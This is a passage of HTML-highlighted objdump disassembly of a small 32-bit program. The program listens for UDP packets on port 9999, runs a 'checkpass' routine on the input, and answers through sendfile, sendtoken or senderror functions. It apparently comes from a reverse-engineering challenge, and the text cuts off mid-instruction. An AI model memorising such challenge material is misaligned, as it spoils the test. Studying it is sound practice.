class="mh"08048670/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048670: ff 25 20 91 04 08 jmp DWORD PTR ds:0x8049120/span/span span class="code-line"span class="x" 8048676: 68 28 00 00 00 push 0x28/span/span span class="code-line"span class="x" 804867b: e9 90 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048680/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048680: ff 25 24 91 04 08 jmp DWORD PTR ds:0x8049124/span/span span class="code-line"span class="x" 8048686: 68 30 00 00 00 push 0x30/span/span span class="code-line"span class="x" 804868b: e9 80 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048690/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048690: ff 25 28 91 04 08 jmp DWORD PTR ds:0x8049128/span/span span class="code-line"span class="x" 8048696: 68 38 00 00 00 push 0x38/span/span span class="code-line"span class="x" 804869b: e9 70 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486a0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="x" 80486a6: 68 40 00 00 00 push 0x40/span/span span class="code-line"span class="x" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486b0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="x" 80486b6: 68 48 00 00 00 push 0x48/span/span span class="code-line"span class="x" 80486bb: e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486c0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="x" 80486c6: 68 50 00 00 00 push 0x50/span/span span class="code-line"span class="x" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486d0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="x" 80486d6: 68 58 00 00 00 push 0x58/span/span span class="code-line"span class="x" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486e0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="x" 80486e6: 68 60 00 00 00 push 0x60/span/span span class="code-line"span class="x" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486f0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="x" 80486f6: 68 68 00 00 00 push 0x68/span/span span class="code-line"span class="x" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048700/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="x" 8048706: 68 70 00 00 00 push 0x70/span/span span class="code-line"span class="x" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048710/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="x" 8048716: 68 78 00 00 00 push 0x78/span/span span class="code-line"span class="x" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048720/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="x" 8048726: 68 80 00 00 00 push 0x80/span/span span class="code-line"span class="x" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048730/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="x" 8048736: 68 88 00 00 00 push 0x88/span/span span class="code-line"span class="x" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048740/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="x" 8048746: 68 90 00 00 00 push 0x90/span/span span class="code-line"span class="x" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048750/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="x" 8048756: 68 98 00 00 00 push 0x98/span/span span class="code-line"span class="x" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048760/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="x" 8048766: 68 a0 00 00 00 push 0xa0/span/span span class="code-line"span class="x" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048770/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="x" 8048776: 68 a8 00 00 00 push 0xa8/span/span span class="code-line"span class="x" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".text/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048780/span span class="p"lt;/spanspan class="nf"_start/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048780: 31 ed xor ebp,ebp/span/span span class="code-line"span class="x" 8048782: 5e pop esi/span/span span class="code-line"span class="x" 8048783: 89 e1 mov ecx,esp/span/span span class="code-line"span class="x" 8048785: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048788: 50 push eax/span/span span class="code-line"span class="x" 8048789: 54 push esp/span/span span class="code-line"span class="x" 804878a: 52 push edx/span/span span class="code-line"span class="x" 804878b: 68 00 8d 04 08 push 0x8048d00/span/span span class="code-line"span class="x" 8048790: 68 10 8d 04 08 push 0x8048d10/span/span span class="code-line"span class="x" 8048795: 51 push ecx/span/span span class="code-line"span class="x" 8048796: 56 push esi/span/span span class="code-line"span class="x" 8048797: 68 6c 88 04 08 push 0x804886c/span/span span class="code-line"span class="x" 804879c: e8 3f ff ff ff call 80486e0 lt;[email protected];/span/span span class="code-line"span class="x" 80487a1: f4 hlt /span/span span class="code-line"span class="x" 80487a2: 90 nop/span/span span class="code-line"span class="x" 80487a3: 90 nop/span/span span class="code-line"span class="x" 80487a4: 90 nop/span/span span class="code-line"span class="x" 80487a5: 90 nop/span/span span class="code-line"span class="x" 80487a6: 90 nop/span/span span class="code-line"span class="x" 80487a7: 90 nop/span/span span class="code-line"span class="x" 80487a8: 90 nop/span/span span class="code-line"span class="x" 80487a9: 90 nop/span/span span class="code-line"span class="x" 80487aa: 90 nop/span/span span class="code-line"span class="x" 80487ab: 90 nop/span/span span class="code-line"span class="x" 80487ac: 90 nop/span/span span class="code-line"span class="x" 80487ad: 90 nop/span/span span class="code-line"span class="x" 80487ae: 90 nop/span/span span class="code-line"span class="x" 80487af: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"080487b0/span span class="p"lt;/spanspan class="nf"deregister_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487b0: b8 6f 91 04 08 mov eax,0x804916f/span/span span class="code-line"span class="x" 80487b5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ba: 83 f8 06 cmp eax,0x6/span/span span class="code-line"span class="x" 80487bd: 77 02 ja 80487c1 lt;deregister_tm_clones+0x11gt;/span/span span class="code-line"span class="x" 80487bf: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487c1: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 80487c6: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 80487c8: 74 f5 je 80487bf lt;deregister_tm_clones+0xfgt;/span/span span class="code-line"span class="x" 80487ca: 55 push ebp/span/span span class="code-line"span class="x" 80487cb: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80487cd: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 80487d0: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 80487d7: ff d0 call eax/span/span span class="code-line"span class="x" 80487d9: c9 leave /span/span span class="code-line"span class="x" 80487da: c3 ret /span/span span class="code-line"span class="x" 80487db: 90 nop/span/span span class="code-line"span class="x" 80487dc: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"080487e0/span span class="p"lt;/spanspan class="nf"register_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487e0: b8 6c 91 04 08 mov eax,0x804916c/span/span span class="code-line"span class="x" 80487e5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ea: c1 f8 02 sar eax,0x2/span/span span class="code-line"span class="x" 80487ed: 89 c2 mov edx,eax/span/span span class="code-line"span class="x" 80487ef: c1 ea 1f shr edx,0x1f/span/span span class="code-line"span class="x" 80487f2: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80487f4: d1 f8 sar eax,1/span/span span class="code-line"span class="x" 80487f6: 75 02 jne 80487fa lt;register_tm_clones+0x1agt;/span/span span class="code-line"span class="x" 80487f8: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487fa: ba 00 00 00 00 mov edx,0x0/span/span span class="code-line"span class="x" 80487ff: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 8048801: 74 f5 je 80487f8 lt;register_tm_clones+0x18gt;/span/span span class="code-line"span class="x" 8048803: 55 push ebp/span/span span class="code-line"span class="x" 8048804: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048806: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048809: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804880d: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 8048814: ff d2 call edx/span/span span class="code-line"span class="x" 8048816: c9 leave /span/span span class="code-line"span class="x" 8048817: c3 ret /span/span span class="code-line"span class="x" 8048818: 90 nop/span/span span class="code-line"span class="x" 8048819: 8d b4 26 00 00 00 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048820/span span class="p"lt;/spanspan class="nf"__do_global_dtors_aux/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048820: 80 3d 6c 91 04 08 00 cmp BYTE PTR ds:0x804916c,0x0/span/span span class="code-line"span class="x" 8048827: 75 13 jne 804883c lt;__do_global_dtors_aux+0x1cgt;/span/span span class="code-line"span class="x" 8048829: 55 push ebp/span/span span class="code-line"span class="x" 804882a: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804882c: 83 ec 08 sub esp,0x8/span/span span class="code-line"span class="x" 804882f: e8 7c ff ff ff call 80487b0 lt;deregister_tm_clonesgt;/span/span span class="code-line"span class="x" 8048834: c6 05 6c 91 04 08 01 mov BYTE PTR ds:0x804916c,0x1/span/span span class="code-line"span class="x" 804883b: c9 leave /span/span span class="code-line"span class="x" 804883c: f3 c3 repz ret /span/span span class="code-line"span class="x" 804883e: 66 90 xchg ax,ax/span/span span class="code-line"/span span class="code-line"span class="mh"08048840/span span class="p"lt;/spanspan class="nf"frame_dummy/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048840: a1 08 90 04 08 mov eax,ds:0x8049008/span/span span class="code-line"span class="x" 8048845: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048847: 74 1e je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048849: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 804884e: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048850: 74 15 je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048852: 55 push ebp/span/span span class="code-line"span class="x" 8048853: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048855: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048858: c7 04 24 08 90 04 08 mov DWORD PTR [esp],0x8049008/span/span span class="code-line"span class="x" 804885f: ff d0 call eax/span/span span class="code-line"span class="x" 8048861: c9 leave /span/span span class="code-line"span class="x" 8048862: e9 79 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="x" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"/span span class="code-line"span class="mh"0804886c/span span class="p"lt;/spanspan class="nf"main/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 804886c: 55 push ebp/span/span span class="code-line"span class="x" 804886d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804886f: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048872: 81 ec 40 04 00 00 sub esp,0x440/span/span span class="code-line"span class="x" 8048878: c7 44 24 08 00 00 00 mov DWORD PTR [esp+0x8],0x0/span/span span class="code-line"span class="x" 804887f: 00 /span/span span class="code-line"span class="x" 8048880: c7 44 24 04 01 00 00 mov DWORD PTR [esp+0x4],0x1/span/span span class="code-line"span class="x" 8048887: 00 /span/span span class="code-line"span class="x" 8048888: c7 04 24 02 00 00 00 mov DWORD PTR [esp],0x2/span/span span class="code-line"span class="x" 804888f: e8 cc fe ff ff call 8048760 lt;[email protected];/span/span span class="code-line"span class="x" 8048894: 89 84 24 3c 04 00 00 mov DWORD PTR [esp+0x43c],eax/span/span span class="code-line"span class="x" 804889b: c7 44 24 04 10 00 00 mov DWORD PTR [esp+0x4],0x10/span/span span class="code-line"span class="x" 80488a2: 00 /span/span span class="code-line"span class="x" 80488a3: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488aa: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80488ad: e8 8e fd ff ff call 8048640 lt;[email protected];/span/span span class="code-line"span class="x" 80488b2: 66 c7 84 24 20 04 00 mov WORD PTR [esp+0x420],0x2/span/span span class="code-line"span class="x" 80488b9: 00 02 00 /span/span span class="code-line"span class="x" 80488bc: c7 04 24 00 00 00 00 mov DWORD PTR [esp],0x0/span/span span class="code-line"span class="x" 80488c3: e8 68 fe ff ff call 8048730 lt;[email protected];/span/span span class="code-line"span class="x" 80488c8: 89 84 24 24 04 00 00 mov DWORD PTR [esp+0x424],eax/span/span span class="code-line"span class="x" 80488cf: c7 04 24 0f 27 00 00 mov DWORD PTR [esp],0x270f/span/span span class="code-line"span class="x" 80488d6: e8 a5 fd ff ff call 8048680 lt;[email protected];/span/span span class="code-line"span class="x" 80488db: 66 89 84 24 22 04 00 mov WORD PTR [esp+0x422],ax/span/span span class="code-line"span class="x" 80488e2: 00 /span/span span class="code-line"span class="x" 80488e3: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 80488ea: 00 /span/span span class="code-line"span class="x" 80488eb: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488f2: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80488f6: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 80488fd: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048900: e8 eb fd ff ff call 80486f0 lt;[email protected];/span/span span class="code-line"span class="x" 8048905: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 804890c: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 8048913: 00 /span/span span class="code-line"span class="x" 8048914: 74 20 je 8048936 lt;main+0xcagt;/span/span span class="code-line"span class="x" 8048916: c7 44 24 04 0f 27 00 mov DWORD PTR [esp+0x4],0x270f/span/span span class="code-line"span class="x" 804891d: 00 /span/span span class="code-line"span class="x" 804891e: c7 04 24 90 8d 04 08 mov DWORD PTR [esp],0x8048d90/span/span span class="code-line"span class="x" 8048925: e8 06 fd ff ff call 8048630 lt;[email protected];/span/span span class="code-line"span class="x" 804892a: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048931: e8 8a fd ff ff call 80486c0 lt;[email protected];/span/span span class="code-line"span class="x" 8048936: c7 44 24 04 00 04 00 mov DWORD PTR [esp+0x4],0x400/span/span span class="code-line"span class="x" 804893d: 00 /span/span span class="code-line"span class="x" 804893e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048945: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048948: e8 f3 fd ff ff call 8048740 lt;[email protected];/span/span span class="code-line"span class="x" 804894d: c7 84 24 0c 04 00 00 mov DWORD PTR [esp+0x40c],0x10/span/span span class="code-line"span class="x" 8048954: 10 00 00 00 /span/span span class="code-line"span class="x" 8048958: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804895f: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048963: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 804896a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804896e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048975: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048978: e8 13 fd ff ff call 8048690 lt;[email protected];/span/span span class="code-line"span class="x" 804897d: 89 84 24 34 04 00 00 mov DWORD PTR [esp+0x434],eax/span/span span class="code-line"span class="x" 8048984: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804898b: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 804898f: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 8048996: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 804899a: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 80489a1: 00 /span/span span class="code-line"span class="x" 80489a2: c7 44 24 08 e8 03 00 mov DWORD PTR [esp+0x8],0x3e8/span/span span class="code-line"span class="x" 80489a9: 00 /span/span span class="code-line"span class="x" 80489aa: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489ae: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80489b2: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 80489b9: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489bc: e8 9f fc ff ff call 8048660 lt;[email protected];/span/span span class="code-line"span class="x" 80489c1: 89 84 24 30 04 00 00 mov DWORD PTR [esp+0x430],eax/span/span span class="code-line"span class="x" 80489c8: 8d 54 24 24 lea edx,[esp+0x24]/span/span span class="code-line"span class="x" 80489cc: 8b 84 24 30 04 00 00 mov eax,DWORD PTR [esp+0x430]/span/span span class="code-line"span class="x" 80489d3: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80489d5: c6 00 00 mov BYTE PTR [eax],0x0/span/span span class="code-line"span class="x" 80489d8: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489dc: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489df: e8 a8 02 00 00 call 8048c8c lt;checkpassgt;/span/span span class="code-line"span class="x" 80489e4: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 80489eb: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 80489f2: 00 /span/span span class="code-line"span class="x" 80489f3: 0f 84 8c 00 00 00 je 8048a85 lt;main+0x219gt;/span/span span class="code-line"span class="x" 80489f9: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x5/span/span span class="code-line"span class="x" 8048a00: 05 /span/span span class="code-line"span class="x" 8048a01: 74 45 je 8048a48 lt;main+0x1dcgt;/span/span span class="code-line"span class="x" 8048a03: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048a07: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 8048a0b: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a12: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a16: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a1d: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a21: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a28: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a2c: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a33: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a37: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a3e: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a41: e8 41 01 00 00 call 8048b87 lt;senderrorgt;/span/span span class="code-line"span class="x" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a48: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a4f: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a53: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a5a: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a5e: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a65: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a69: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a70: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a74: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a7b: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a7e: e8 76 01 00 00 call 8048bf9 lt;sendtokengt;/span/span span class="code-line"span class="x" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a85: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a8c: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a90: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a97: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a9b: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048aa2: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048aa6: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048aad: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048ab1: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ab8: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048abb: e8 34 00 00 00 call 8048af4 lt;sendfilegt;/span/span span class="code-line"span class="x" 8048ac0: c7 04 24 b2 8d 04 08 mov DWORD PTR [esp],0x8048db2/span/span span class="code-line"span class="x" 8048ac7: e8 d4 fb ff ff call 80486a0 lt;[email protected];/span/span span class="code-line"span class="x" 8048acc: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048ad0: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048ad4: c7 04 24 ca 8d 04 08 mov DWORD PTR [esp],0x8048dca/span/span span class="code-line"span class="x" 8048adb: e8 50 fb ff ff call 8048630 lt;[email protected];/span/span span class="code-line"span class="x" 8048ae0: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ae7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048aea: e8 81 fc ff ff call 8048770 lt;[email protected];/span/span span class="code-line"span class="x" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048af4/span span class="p"lt;/spanspan class="nf"sendfile/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048af4: 55 push ebp/span/span span class="code-line"span class="x" 8048af5: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048af7: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048afa: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048b01: 08 /span/span span class="code-line"span class="x" 8048b02: c7 04 24 cf 8d 04 08 mov DWORD PTR [esp],0x8048dcf/span/span span class="code-line"span class="x" 8048b09: e8 f2 fb ff ff call 8048700 lt;[email protected];/span/span span class="code-line"span class="x" 8048b0e: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048b11: 83 7d f4 00 cmp DWORD PTR [ebp-0xc],0x0/span/span span class="code-line"span class="x" 8048b15: 74 56 je 8048b6d lt;sendfile+0x79gt;/span/span span class="code-line"span class="x" 8048b17: eb 31 jmp 8048b4a lt;sendfile+0x56gt;/span/span span class="code-line"span class="x" 8048b19: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048b20: 00 /span/span span class="code-line"span class="x" 8048b21: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048b24: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048b28: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048b2f: 00 /span/span span class="code-line"span class="x" 8048b30: c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1/span/span span class="code-line"span class="x" 8048b37: 00 /span/span span class="code-line"span class="x" 8048b38: 8d 45 f0 lea eax,[ebp-0x10]/span/span span class="code-line"span class="x" 8048b3b: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048b3f: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048b42: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b45: e8 d6 fb ff ff call 8048720 lt;[email protected];/span/span span class="code-line"span class="x" 8048b4a: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048b4d: 89 04 24 mov 